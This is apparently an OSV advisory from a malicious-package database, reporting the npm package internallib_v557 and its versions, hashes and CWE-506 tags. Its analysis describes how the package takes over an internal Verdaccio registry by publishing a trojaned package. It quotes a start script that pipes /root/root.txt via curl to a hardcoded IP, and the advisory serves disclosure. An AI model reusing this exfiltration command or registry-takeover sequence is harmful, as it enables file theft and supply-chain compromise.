{"id":"MAL-2026-5678","summary":"Malicious code in internallib_v557 (npm)","details":"\n---\n_-= Per source details. Do not edit below this line.=-_\n\n## Source: amazon-inspector (275af9596caf2b68994ca8282da7e127f8a4478e07888dbae73826328b4e41f2)\nindex.js implements a multi-step attack against an internal npm registry. On invocation of the exported command(), it: (1) creates a Verdaccio user `pwn99`/`pwn99pass` against http://0.0.0.0:4873/-/user/org.couchdb.user:pwn99 via curl PUT; (2) queries the existing `uhclabs_local_check` package metadata; (3) writes /tmp/pwn99/.npmrc containing a base64-encoded `_auth` for those credentials; (4) `npm publish`es a malicious `uhclabs_local_check@2.0.0` to http://0.0.0.0:4873/ whose package.json `scripts.start` is `cat /root/root.txt | curl -s -d @- http://10.0.0.145:8888/rootflag`; and (5) at every step pipes output (user-create response, version listing, publish stdout/stderr, error output) to http://10.0.0.145:8888/step{1..n} via curl. The downstream effect: any installer who later pulls `uhclabs_local_check` from the internal registry and runs its start script will exfiltrate the contents of /root/root.txt to the hardcoded attacker IP. This is a self-propagating namespace-takeover attack with a hardcoded C2 beacon and attacker-controlled persistence — there is no legitimate purpose consistent with the package's stated 'internal lib' scope.\n","modified":"2026-06-12T16:46:41.712995722Z","published":"2026-06-11T21:57:47Z","database_specific":{"malicious-packages-origins":[{"source":"amazon-inspector","modified_time":"2026-06-11T21:57:47Z","import_time":"2026-06-11T22:13:50.595564058Z","versions":["1.0.10"],"id":"IN-MAL-2026-005751","sha256":"5cfa498f80e5965de3c072803c8d6e812e75bc5a4fb031f739cbd9c181724be3"},{"sha256":"515c59a706648511619a76984f038231fb7a377179ffc8f223fb6c6344d8022d","source":"amazon-inspector","modified_time":"2026-06-12T15:28:06Z","versions":["1.0.12"],"id":"IN-MAL-2026-005771","import_time":"2026-06-12T16:32:15.269218098Z"},{"sha256":"8a46697983d45d227ca57159302128b0003402847d4e7978650c9e7b88eb43e8","source":"amazon-inspector","modified_time":"2026-06-12T15:28:16Z","versions":["1.0.1"],"id":"IN-MAL-2026-005781","import_time":"2026-06-12T16:32:15.894391289Z"},{"import_time":"2026-06-12T16:32:14.897088591Z","sha256":"8f864aa225698875afc8ce2feefef9f46feaec9532dd0ae41a752ca0ad3ffc01","source":"amazon-inspector","versions":["1.0.21"],"id":"IN-MAL-2026-005765","modified_time":"2026-06-12T15:28:00Z"},{"sha256":"909cc0b096213d5fabf0b417a6ceb5fee4d420f19dd0777a9dd048b92552223f","source":"amazon-inspector","modified_time":"2026-06-12T15:27:58Z","versions":["1.0.19"],"id":"IN-MAL-2026-005762","import_time":"2026-06-12T16:32:14.70996645Z"},{"import_time":"2026-06-12T16:32:15.130829664Z","sha256":"a1cceaa6a553e20e294688ef48cec8478cbd75242f67b74763937cd46297379e","source":"amazon-inspector","versions":["1.0.15"],"id":"IN-MAL-2026-005768","modified_time":"2026-06-12T15:28:02Z"},{"import_time":"2026-06-12T16:32:15.240809042Z","sha256":"24753e0f7dcb30069b7e081debea1589b8f53a03f772593cf8a39886b3b22d0d","source":"amazon-inspector","versions":["1.0.23"],"id":"IN-MAL-2026-005770","modified_time":"2026-06-12T15:28:03Z"},{"import_time":"2026-06-12T16:32:15.051860142Z","sha256":"371586c765a962078a96bb0ecec7b5000a0a9783d01cc02907284ac4088ace4f","source":"amazon-inspector","versions":["1.0.16"],"id":"IN-MAL-2026-005767","modified_time":"2026-06-12T15:28:02Z"},{"sha256":"666cbd7854858b60fbed7ef9845c93ceb4d33ccf5c810b97d16d6c0fb75bda38","source":"amazon-inspector","modified_time":"2026-06-12T15:28:13Z","versions":["1.0.3"],"id":"IN-MAL-2026-005779","import_time":"2026-06-12T16:32:15.788573494Z"},{"import_time":"2026-06-12T16:32:15.375254983Z","sha256":"6df43f4bbb1c58bc26e585f209581aa8f2b1f1ffc639e5fe5f9d61bc774eeb1c","source":"amazon-inspector","versions":["1.0.11"],"id":"IN-MAL-2026-005772","modified_time":"2026-06-12T15:28:07Z"},{"modified_time":"2026-06-12T15:28:09Z","import_time":"2026-06-12T16:32:15.585669983Z","sha256":"ae5880951f8d5f9562e80a80d6f54af58c7129738744d6a5627548583adf9d8e","versions":["1.0.7"],"id":"IN-MAL-2026-005775","source":"amazon-inspector"},{"import_time":"2026-06-12T16:32:15.202339872Z","sha256":"c4b860370e48fbf532c58a1ab2734c9e75662d082a59a4684b0565b08a622304","source":"amazon-inspector","versions":["1.0.14"],"id":"IN-MAL-2026-005769","modified_time":"2026-06-12T15:28:03Z"},{"sha256":"db9ae27bb3518e5ef3e739386892f4b856fba9a4a7aeec518ddbddd914e095d5","source":"amazon-inspector","modified_time":"2026-06-12T15:28:10Z","versions":["1.0.6"],"id":"IN-MAL-2026-005776","import_time":"2026-06-12T16:32:15.62337251Z"},{"import_time":"2026-06-12T16:32:15.707413043Z","sha256":"e0b0a84585b8b97bd9b36a33c21ef65c034ce41510775a2e7ac77121a892ceaa","source":"amazon-inspector","versions":["1.0.5"],"id":"IN-MAL-2026-005777","modified_time":"2026-06-12T15:28:11Z"},{"sha256":"e743cd648f1208ebab7ad50f02509299935d363a9d5dd69fc50f6402782732bc","source":"amazon-inspector","modified_time":"2026-06-12T15:28:07Z","versions":["1.0.13"],"id":"IN-MAL-2026-005773","import_time":"2026-06-12T16:32:15.42351404Z"},{"sha256":"f58c6e76bd6d209bf6cf13052a5000c4d721c85d16f79327b55bd6874949a893","source":"amazon-inspector","modified_time":"2026-06-12T15:28:12Z","versions":["1.0.4"],"id":"IN-MAL-2026-005778","import_time":"2026-06-12T16:32:15.752300278Z"},{"source":"amazon-inspector","modified_time":"2026-06-12T15:28:13Z","import_time":"2026-06-12T16:32:15.864366487Z","versions":["1.0.9"],"id":"IN-MAL-2026-005780","sha256":"0ad3524bb951bb15ff05760def59425d5040545f3aa89cd479c2fcc644eff438"},{"source":"amazon-inspector","modified_time":"2026-06-12T15:28:27Z","import_time":"2026-06-12T16:32:16.618512899Z","versions":["1.0.2"],"id":"IN-MAL-2026-005791","sha256":"12ad882400a73a732f26c29c00d2a16377841a28fbb3fa09b596bf47a4707b24"},{"source":"amazon-inspector","modified_time":"2026-06-12T15:27:58Z","import_time":"2026-06-12T16:32:14.768980591Z","versions":["1.0.22"],"id":"IN-MAL-2026-005763","sha256":"26ab651e98275ede4899e22698958e4d97a43134a0bbb0020f567971b83451e2"},{"sha256":"275af9596caf2b68994ca8282da7e127f8a4478e07888dbae73826328b4e41f2","source":"amazon-inspector","modified_time":"2026-06-12T15:27:59Z","versions":["1.0.24"],"id":"IN-MAL-2026-005764","import_time":"2026-06-12T16:32:14.799632682Z"},{"import_time":"2026-06-12T16:32:14.96805996Z","sha256":"d04f618170995d95d6e7b8a720f4ffc9d59940c8d86ddc4e412a1f579e281f2a","source":"amazon-inspector","versions":["1.0.18"],"id":"IN-MAL-2026-005766","modified_time":"2026-06-12T15:28:01Z"},{"sha256":"4423dbd9ea4452b6b0c4e2c663c82d811718c163228f685cc528923a7d11a089","source":"amazon-inspector","modified_time":"2026-06-12T15:28:08Z","versions":["1.0.8"],"id":"IN-MAL-2026-005774","import_time":"2026-06-12T16:32:15.469642857Z"}]},"references":[{"type":"PACKAGE","url":"https://www.npmjs.com/package/internallib_v557/v/1.0.10"},{"type":"PACKAGE","url":"https://www.npmjs.com/package/internallib_v557/v/1.0.12"},{"type":"PACKAGE","url":"https://www.npmjs.com/package/internallib_v557/v/1.0.1"},{"type":"PACKAGE","url":"https://www.npmjs.com/package/internallib_v557/v/1.0.21"},{"type":"PACKAGE","url":"https://www.npmjs.com/package/internallib_v557/v/1.0.19"},{"type":"PACKAGE","url":"https://www.npmjs.com/package/internallib_v557/v/1.0.15"},{"type":"PACKAGE","url":"https://www.npmjs.com/package/internallib_v557/v/1.0.23"},{"type":"PACKAGE","url":"https://www.npmjs.com/package/internallib_v557/v/1.0.16"},{"type":"PACKAGE","url":"https://www.npmjs.com/package/internallib_v557/v/1.0.3"},{"type":"PACKAGE","url":"https://www.npmjs.com/package/internallib_v557/v/1.0.11"},{"type":"PACKAGE","url":"https://www.npmjs.com/package/internallib_v557/v/1.0.7"},{"type":"PACKAGE","url":"https://www.npmjs.com/package/internallib_v557/v/1.0.14"},{"type":"PACKAGE","url":"https://www.npmjs.com/package/internallib_v557/v/1.0.6"},{"type":"PACKAGE","url":"https://www.npmjs.com/package/internallib_v557/v/1.0.5"},{"type":"PACKAGE","url":"https://www.npmjs.com/package/internallib_v557/v/1.0.13"},{"type":"PACKAGE","url":"https://www.npmjs.com/package/internallib_v557/v/1.0.4"},{"type":"PACKAGE","url":"https://www.npmjs.com/package/internallib_v557/v/1.0.9"},{"type":"PACKAGE","url":"https://www.npmjs.com/package/internallib_v557/v/1.0.2"},{"type":"PACKAGE","url":"https://www.npmjs.com/package/internallib_v557/v/1.0.22"},{"type":"PACKAGE","url":"https://www.npmjs.com/package/internallib_v557/v/1.0.24"},{"type":"PACKAGE","url":"https://www.npmjs.com/package/internallib_v557/v/1.0.18"},{"type":"PACKAGE","url":"https://www.npmjs.com/package/internallib_v557/v/1.0.8"}],"affected":[{"package":{"name":"internallib_v557","ecosystem":"npm","purl":"pkg:npm/internallib_v557"},"versions":["1.0.10","1.0.12","1.0.1","1.0.21","1.0.19","1.0.15","1.0.23","1.0.16","1.0.3","1.0.11","1.0.7","1.0.14","1.0.6","1.0.5","1.0.13","1.0.4","1.0.9","1.0.2","1.0.22","1.0.24","1.0.18","1.0.8"],"database_specific":{"source":"https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/internallib_v557/MAL-2026-5678.json","indicators":{"package_integrity":[{"hashes":{"sha512_sri":"sha512-v1A2a2iSC5rrDtawvn1b+bLMFjm43uxbd15iewsIJZUyXfC72ElqplrugXqEOF7kfSm80VGirjxc8lLBQz5oxg==","sha1":"fdaf438f4bda6323d60d6153ef43c51eb9930d96"},"filename":"internallib_v557-1.0.10.tgz"}],"evidence_files":[{"sha256":"c1a4eddedda9b48d93724f255d71cf4a8bf3bc3353436dd66cedc1a9d3d062c8","path":"index.js","tlsh":"c321110519b720351b7a24b59b7ba416b2438d23203cfa603acf97219fc06ac40bf6fc"}]},"cwes":[{"description":"The product contains code that appears to be malicious in nature.","cweId":"CWE-506","name":"Embedded Malicious Code"},{"description":"The product contains code that appears to be malicious in nature.","cweId":"CWE-506","name":"Embedded Malicious Code"},{"description":"The product contains code that appears to be malicious in nature.","cweId":"CWE-506","name":"Embedded Malicious Code"},{"description":"The product contains code that appears to be malicious in nature.","cweId":"CWE-506","name":"Embedded Malicious Code"},{"description":"The product contains code that appears to be malicious in nature.","cweId":"CWE-506","name":"Embedded Malicious Code"},{"description":"The product contains code that appears to be malicious in nature.","cweId":"CWE-506","name":"Embedded Malicious Code"},{"description":"The product contains code that appears to be malicious in nature.","cweId":"CWE-506","name":"Embedded Malicious Code"},{"description":"The product contains code that appears to be malicious in nature.","cweId":"CWE-506","name":"Embedded Malicious Code"},{"description":"The product contains code that appears to be malicious in nature.","cweId":"CWE-506","name":"Embedded Malicious Code"},{"description":"The product contains code that appears to be malicious in nature.","cweId":"CWE-506","name":"Embedded Malicious Code"},{"description":"The product contains code that appears to be malicious in nature.","cweId":"CWE-506","name":"Embedded Malicious Code"},{"description":"The product contains code that appears to be malicious in nature.","cweId":"CWE-506","name":"Embedded Malicious Code"},{"description":"The product contains code that appears to be malicious in nature.","cweId":"CWE-506","name":"Embedded Malicious Code"},{"description":"The product contains code that appears to be malicious in nature.","cweId":"CWE-506","name":"Embedded Malicious Code"},{"description":"The product contains code that appears to be malicious in nature.","cweId":"CWE-506","name":"Embedded Malicious Code"},{"description":"The product contains code that appears to be malicious in nature.","cweId":"CWE-506","name":"Embedded Malicious Code"},{"description":"The product contains code that appears to be malicious in nature.","cweId":"CWE-506","name":"Embedded Malicious Code"},{"description":"The product contains code that appears to be malicious in nature.","cweId":"CWE-506","name":"Embedded Malicious Code"},{"description":"The product contains code that appears to be malicious in nature.","cweId":"CWE-506","name":"Embedded Malicious Code"},{"description":"The product contains code that appears to be malicious in nature.","cweId":"CWE-506","name":"Embedded Malicious Code"},{"description":"The product contains code that appears to be malicious in nature.","cweId":"CWE-506","name":"Embedded Malicious Code"},{"description":"The product contains code that appears to be malicious in nature.","cweId":"CWE-506","name":"Embedded Malicious Code"}]}}],"schema_version":"1.7.5","credits":[{"name":"Amazon Inspector","contact":["inspector-research@amazon.com"],"type":"FINDER"}]}